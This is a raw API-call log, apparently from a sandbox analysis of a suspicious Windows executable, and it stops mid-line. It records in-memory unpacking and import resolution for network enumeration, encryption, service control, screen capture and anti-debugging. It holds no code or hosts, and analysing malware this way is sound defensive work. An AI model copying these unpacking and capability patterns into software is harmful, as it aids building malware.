[0158.399] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0158.399] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0158.399] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0158.399] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0158.401] Module32First (hSnapshot=0x58, lpme=0x18f370) returned 1 [0158.403] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x21d0000 [0158.425] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0158.425] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0158.425] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0158.425] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0158.425] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0158.425] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0158.425] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0158.425] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0158.425] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0158.426] SetErrorMode (uMode=0x400) returned 0x8001 [0158.426] SetErrorMode (uMode=0x0) returned 0x400 [0158.426] GetVersionExA (in: lpVersionInformation=0x18e2a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e2a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0158.426] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x22f0000 [0158.445] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f328 | out: lpflOldProtect=0x18f328*=0x2) returned 1 [0158.511] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0158.511] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0158.511] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0158.511] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0158.511] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0158.511] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0158.511] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0158.514] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0158.514] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0158.514] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0158.514] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0158.528] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0158.529] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0158.529] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0158.529] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0158.529] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0158.529] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0158.529] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0158.529] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0158.542] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0158.542] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0158.543] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0158.543] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0158.543] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0158.543] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0158.543] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0158.543] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0158.543] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0158.543] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0158.543] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0158.543] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0158.543] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0158.543] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0158.543] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0158.544] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0158.545] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0158.546] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0158.547] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0158.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0158.549] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0158.550] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0158.551] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0158.552] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0158.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0158.553] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0158.553] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0158.554] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0158.555] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0158.555] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0158.555] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0158.555] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0158.555] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0158.555] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0158.555] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0158.555] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0158.555] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0158.555] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0158.555] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0158.555] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0158.555] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0158.555] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0158.556] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0158.557] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0158.557] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0158.559] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0158.559] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0158.560] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0158.560] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0158.560] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0158.560] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0158.560] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0158.560] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0158.560] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0158.560] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0158.560] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0158.560] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0158.560] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0158.560] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0158.560] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0158.561] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0158.561] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0158.561] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0158.561] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0158.561] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0158.561] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0158.564] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0158.564] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0158.566] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0158.566] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0158.566] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0158.566] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0158.568] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0158.569] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0158.569] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0158.569] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0158.569] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0158.569] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0158.569] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0158.569] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0158.569] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0158.569] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0158.569] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0158.570] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0158.570] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0158.570] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0158.570] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0158.570] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0158.573] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0158.573] atexit (param_1=0x21d0920) returned 0 [0158.573] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f338 | out: lpSystemTimeAsFileTime=0x18f338*(dwLowDateTime=0x17629300, dwHighDateTime=0x1d69ad5)) [0158.573] GetCurrentThreadId () returned 0xa18 [0158.573] GetCurrentProcessId () returned 0x900 [0158.573] QueryPerformanceCounter (in: lpPerformanceCount=0x18f330 | out: lpPerformanceCount=0x18f330*=27845365693) returned 1 [0158.573] GetStartupInfoW (in: lpStartupInfo=0x18f2c8 | out: lpStartupInfo=0x18f2c8*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0158.573] GetProcessHeap () returned 0xcd0000 [0158.574] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0158.574] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0158.575] GetProcAddress (hModule=0x76d30000, 